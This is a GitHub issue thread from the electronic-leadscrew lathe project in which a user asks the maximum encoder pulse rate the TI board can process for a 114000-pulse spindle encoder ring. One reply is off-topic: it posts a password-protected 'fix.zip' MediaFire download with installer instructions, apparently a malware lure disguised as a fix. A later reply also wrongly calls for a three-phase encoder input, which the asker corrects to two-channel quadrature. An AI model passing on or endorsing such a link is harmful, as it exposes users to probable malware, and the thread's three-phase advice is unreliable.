clough42/electronic-leadscrew #292: Max spindle encoder value.

bogus105, 2024-08-26:
Guys,
wondering what is the max spindle encoder pulses per second that can be processed by TI microprocessor hardware? I can see nice magnetic encoder rings available. The one that is big enough for my lathes spindle has 114000 pulses per revolution! Math is giving 114000 * 2500 (max lathe rpm) / 60 = 4.75 MHz. Something is telling me it is waaaaay too fast for this board:)
I can't find the limit spec. All i can see it max pulse frequency on stepper output which is 100 kHz. 

Thank you for input.

pilot5657, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

bogus105, 2024-08-26:
What is it?

bogus105, 2024-08-28:
Any ideas?

Chucksbp, 2024-08-28:
I'm not shure of the number you are looking for, but to my understanding you need a 3 phase input from the encoder to operate the TI board. thats how it determins direction. agin I'm far from an expert, but noone replied. there seems to be very little activity on herre as of late. Myself and another pearson had failures with the eBay encoders a couple years ago and switched to a differant brand on Amazon. same size and fit just a bit better built in my opinion. we also lost the first input on the TI board when the encoder failed. I believ the dicussion is below.

bogus105, 2024-08-28:
Thanks. Well it's not 3 phase. It is 2 phase - two channels A and B square wave, 90 elec degreed apart. I'll try to take time and study processor manual to see the limits of its hardware encoder interface.